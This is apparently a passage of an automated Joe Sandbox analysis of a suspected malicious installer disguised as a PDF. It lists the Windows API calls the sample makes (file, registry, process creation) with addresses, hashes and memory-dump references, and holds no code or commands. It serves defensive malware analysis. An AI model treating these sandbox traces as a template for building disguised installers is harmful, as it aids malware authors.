                                                                                                                                                                                    • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                    • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                    • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                    • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                    • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                    • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1096422788-0
                                                                                                                                                                                    • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                                    • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                                                                                                                                    • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                                    • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                                                                                                                    • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                                                                                                                    • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                                                                                                                    • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                                                                                                                    • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                    • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                                                                                                                    • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                                                                                                                                                    • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                                                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, ohowno",?), ref: 00405B63
                                                                                                                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, ohowno",?), ref: 00405B70
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                                      • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                                                                                                                      • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                                                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2972824698-0
                                                                                                                                                                                    • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                                                                                                                    • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                                                                                                                                                                    APIs
